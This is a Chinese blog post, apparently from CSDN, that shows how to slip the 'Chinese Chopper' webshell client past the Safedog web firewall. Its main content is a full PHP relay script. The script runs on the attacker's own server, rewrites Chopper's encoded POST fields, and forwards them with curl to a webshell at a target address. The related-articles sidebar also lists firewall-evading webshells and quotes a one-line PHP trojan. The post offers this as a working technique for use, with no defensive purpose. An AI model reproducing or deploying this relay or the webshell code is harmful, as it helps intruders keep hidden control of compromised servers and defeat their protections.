菜刀过狗连接webshell的技巧

最新推荐文章于 2023-05-07 08:58:30 发布
最新推荐文章于 2023-05-07 08:58:30 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: 渗透技巧

自己在搭建的服务器上创建一个有以下代码的php文件 然后用菜刀来连接这个php文件 通过其中的代码的加密方式传输数据 达到过安全狗的目的····

$target="http://192.168.1.131:81/1.php";//$target里面的url 就是你的webshell的地址
$poststr='';
$i=0;
foreach($_POST as $k=>$v)
{
if(strstr($v, "base64_decode"))
{
$v=str_replace("base64_decode(","",$v);
$v=str_replace("))",")",$v);
}
else
{
if($k==="z0")
$v=base64_decode($v);
}
$pp=$k."=".urlencode($v);
//echo($pp);
if($i!=0)
{
$poststr=$poststr."&".$pp;
}
else
{
$poststr=$pp;
}
$i=$i+1;
}
$ch = curl_init();
$curl_url = $target."?".$_SERVER['QUERY_STRING'];
curl_setopt($ch, CURLOPT_URL, $curl_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
?>
小鱼儿waha
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2016最新aspx免杀webshell过安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
2016最新php免杀webshell过安全狗
03-05
上传压缩文件夹里的php文件不会有任何报毒,过最新版安全狗。2016已测试
web安全第四天:webshell原理与菜刀使用
cc777777777的博客
02-26 1564
webshell原理与菜刀使用
DVWA中国菜刀连接不上问题(低安全级别就连不上,看看这!!)
S__White的博客
10-30 5612
测试环境:虚拟机搭建DVWA,php7.3.4 连接工具:中国菜刀 安全级别:LOW 上传一句话木马过程省略 解决发生: 解决问题: 将php版本降低为php5.0即可 (小白一枚,解决第一个问题,记录一下,希望可以帮到很多人!!) ...
初始webshell+中国菜刀的使用
m0_48222671的博客
04-18 5117
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 文章目录一、webshell是什么?二、木马三、中国菜刀 一、webshell是什么? “Web” 的含义是服务器开放web服务; "Shell"的含义是取得对服务器某种程度上的操作权限; "webshell"就是获取对服务器的控制权限,这就需要我们借助一些webshell管理工具和一些漏洞去得到这种权限。 二、木马 在我们使用webshell管理工具之前,需要先在目标服务器上传或创建一个木马文件 木马分为大马、小马和一句话木马: 小马:文.
一句话木马过狗 php,PHP一句话木马过安全狗等杀软
weixin_30774813的博客
03-09 300
第一种:1.php=($_=@$_GET[2]).@$_($_GET[1])?>用中国菜刀连接:http://www.cn-caidao.com/1.php?2=assert密码是1第二种:2.php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>=${'_'.$_}['_'](${'_'....
解决中国菜刀连接失败问题
Suuannnn的博客
11-07 7976
今天上传了一个一句话木马,但是怎么也连接不上,抓了个包发现我的php里面的代码出现了特殊字符。 原来原因就出在了编码上,于是我回去检查了一下自己的编码,原来是一不小心用了utf16,把他换回utf8就OK了,心酸!!记录一下 ...
WebShell连接工具(中国菜刀WeBaCoo、Weevely)使用
悦分享
07-31 3176
第三步此会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
菜刀、蚁剑以及冰蝎三款Webshell管理工具简介
永远是少年
05-07 4711
今天继续给大家介绍渗透测试相关知识,本文主要内容是菜刀、蚁剑以及冰蝎三款Webshell管理工具简介。 一、三款webshell管理工具简单对比 二、菜刀数据包解析 三、蚁剑数据包解析 四、冰蝎数据包解析
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
2019PHP最新过狗大码
01-27
批量挂马:输入自己的代码,就可以挂入站里所有文件 环境变量:测试服务器环境与服务器支持设置 在线代理:可以直接在WEBSHELL上代理连接其它网址 注册表操作:可直接操作注册表与查看3389端口 WEBSHELL:以各种权限运行...
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
2024年全球嵌入式配电盘行业总体规模、主要企业国内外市场占有率及排名.docx
04-15
2024年全球嵌入式配电盘行业总体规模、主要企业国内外市场占有率及排名
AccessControl-6.3-cp39-cp39-manylinux_2_17_aarch64.whl.zip
04-15
AccessControl-6.3-cp39-cp39-manylinux_2_17_aarch64.whl.zip
AccessControl-6.0-cp37-cp37m-manylinux_2_5_x86_64.whl.zip
04-15
AccessControl-6.0-cp37-cp37m-manylinux_2_5_x86_64.whl.zip
【Python-WEB自动化-06课-对验证码的处理】
最新发布
04-15
【Python-WEB自动化-06课-对验证码的处理】
AccessControl-5.4-cp38-cp38-manylinux_2_17_aarch64.whl.zip
04-15
AccessControl-5.4-cp38-cp38-manylinux_2_17_aarch64.whl.zip
AX3_Mercadopago-0.2.4-py3-none-any.whl.zip
04-15
AX3_Mercadopago-0.2.4-py3-none-any.whl.zip
连接webshell的工具
04-01
连接webshell的工具有很多,以下是一些常用的工具: 1. Burp Suite:Burp Suite是一个流行的渗透测试工具,可以通过它的Proxy模块来连接webshell。 2. Metasploit:Metasploit是一个流行的渗透测试框架,它可以通过使用Meterpreter模块来连接webshell。 3. Netcat:Netcat是一个常用的网络工具,可以通过在本地计算机上运行一个Netcat服务器来连接webshell。 4. Putty:Putty是一款常用的SSH和Telnet客户端,可以通过它连接webshell。 5. PowerShell:PowerShell是一种基于命令行的脚本语言,可以通过它连接webshell

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值